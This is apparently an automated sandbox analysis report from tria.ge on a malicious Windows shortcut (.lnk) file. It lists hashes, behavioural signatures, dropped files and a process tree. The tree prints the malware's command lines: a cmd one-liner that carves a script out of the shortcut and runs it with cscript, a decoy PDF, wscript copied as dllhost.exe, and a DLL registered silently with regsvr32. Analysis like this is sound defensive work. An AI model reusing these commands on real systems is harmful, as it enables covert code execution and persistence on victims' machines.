Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    191s
  • max time network
    216s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    18/11/2023, 02:49

General

  • Target

    c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk

  • Size

    345KB

  • MD5

    ba26b003f8f8b00da1bb1e4c12d109cc

  • SHA1

    a88b3cc71121c9b96053049892abb98b4db3eedc

  • SHA256

    c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a

  • SHA512

    580de04b864c1dca99635d96344a8e866353633c40d27c366d7d9bb6797ec43106044a071c86338457b3f935ab7f7294b72b2d165b45392bb28f1dda0db9ed48

  • SSDEEP

    6144:ydr8fmEOmqG2K13qPIWAiC/Q5FNTrmwMtGQqOh5PAW7LebJcDgym8/kU0:0QDOmqzHPZAilTiwMtfh5P1Lo4kB

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c DIR 000792244100393251090026219142\00157269330078632939 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk') do (if %~za gtr 79002 (findstr /b "var onm=" "%a" > C:\Users\Admin\AppData\Local\Temp\~26210619.js & cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9))&cls&exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk
        3⤵
          PID:2608
        • C:\Windows\system32\findstr.exe
          findstr /b "var onm=" "C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk"
          3⤵
            PID:2684
          • C:\Windows\system32\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9
            3⤵
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1412
              • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
                "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf"
                5⤵
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                PID:928
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\wscript.exe C:\Users\Admin\AppData\Local\Temp\dllhost.exe /y
              4⤵
                PID:2180
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2824
                • C:\Users\Admin\AppData\Local\Temp\dllhost.exe
                  C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of WriteProcessMemory
                  PID:1044
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:916
                    • C:\Windows\SysWOW64\regsvr32.exe
                      C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
                      7⤵
                      • Loads dropped DLL
                      • Registers COM server for autorun
                      • Modifies registry class
                      PID:2864

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf

          Filesize

          128KB

          MD5

          c585f511f7edb1219e8f891de560614d

          SHA1

          7c7b4ac5f2fe5e3f2138a3945613f7823a00f9be

          SHA256

          831d48b6ab77f6ece7b9549d1dfb6ccf87ff9b230d39c087637288520e4fd83b

          SHA512

          e588162ce74b10880a18a4501a9ebe1f723cf5cbd7949f9d79db93b0625ffb7a5d72287db0a403b12c9bf69480ba9e74b55fe1c136765098a2826c4d7140ae64

        • C:\Users\Admin\AppData\Local\Temp\dllhost.exe

          Filesize

          138KB

          MD5

          d1ab72db2bedd2f255d35da3da0d4b16

          SHA1

          860265276b29b42b8c4b077e5c651def9c81b6e9

          SHA256

          047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0

          SHA512

          b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185

        • C:\Users\Admin\AppData\Local\Temp\dllhost.exe

          Filesize

          138KB

          MD5

          d1ab72db2bedd2f255d35da3da0d4b16

          SHA1

          860265276b29b42b8c4b077e5c651def9c81b6e9

          SHA256

          047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0

          SHA512

          b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185

        • C:\Users\Admin\AppData\Local\Temp\libeay32.dll

          Filesize

          13KB

          MD5

          e0b8dfd17b8e7de760b273d18e58b142

          SHA1

          801509fb6783c9e57edc67a72dde3c62080ffbaf

          SHA256

          4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

          SHA512

          443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

        • C:\Users\Admin\AppData\Local\Temp\~26210619.js

          Filesize

          343KB

          MD5

          a585372367e029c2d987d6c6845f56e6

          SHA1

          abedec3a0071e0df708f011b8e830017460f73bb

          SHA256

          336262cb2d07a9cc6d844a5fbe7c2c85db5ff7d6d05d2f44c029f5baf29b9935

          SHA512

          f0496c5020438d3b1d93bb61fb322ab7677b706f8e472e8f82524f8d43d87ae830d72357a5ba93ed26897b3f0dd9a28d134221b19b9c2063ed362a5f7c22ba4d

        • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

          Filesize

          3KB

          MD5

          28062c7f330be3fe2fae998b2b295a8c

          SHA1

          52ab4e915dc2572fea5d61b6e9150b5143a61c46

          SHA256

          7ff10efff32397f8ff673ed8f24bb84ee1f6870a9fb49e9863294246425ccf91

          SHA512

          0413bef499b73193ed2d1f442edf06951bd6f64c256ac79b756e3201b6060c4a8998b34a3bceb6b1721106503022cde4eae0202a9943eec62e6ecf28bff69cd3

        • \Users\Admin\AppData\Local\Temp\libeay32.dll

          Filesize

          13KB

          MD5

          e0b8dfd17b8e7de760b273d18e58b142

          SHA1

          801509fb6783c9e57edc67a72dde3c62080ffbaf

          SHA256

          4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

          SHA512

          443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

        • \Users\Admin\AppData\Local\Temp\libeay32.dll

          Filesize

          13KB

          MD5

          e0b8dfd17b8e7de760b273d18e58b142

          SHA1

          801509fb6783c9e57edc67a72dde3c62080ffbaf

          SHA256

          4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

          SHA512

          443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

        • memory/1044-93-0x00000000004B0000-0x00000000004C2000-memory.dmp

          Filesize

          72KB

        • memory/1044-94-0x0000000000490000-0x0000000000499000-memory.dmp

          Filesize

          36KB

        • memory/1044-92-0x0000000000340000-0x0000000000341000-memory.dmp

          Filesize

          4KB

        • memory/1044-84-0x0000000000340000-0x0000000000341000-memory.dmp

          Filesize

          4KB

        • memory/1044-96-0x00000000004B0000-0x00000000004C2000-memory.dmp

          Filesize

          72KB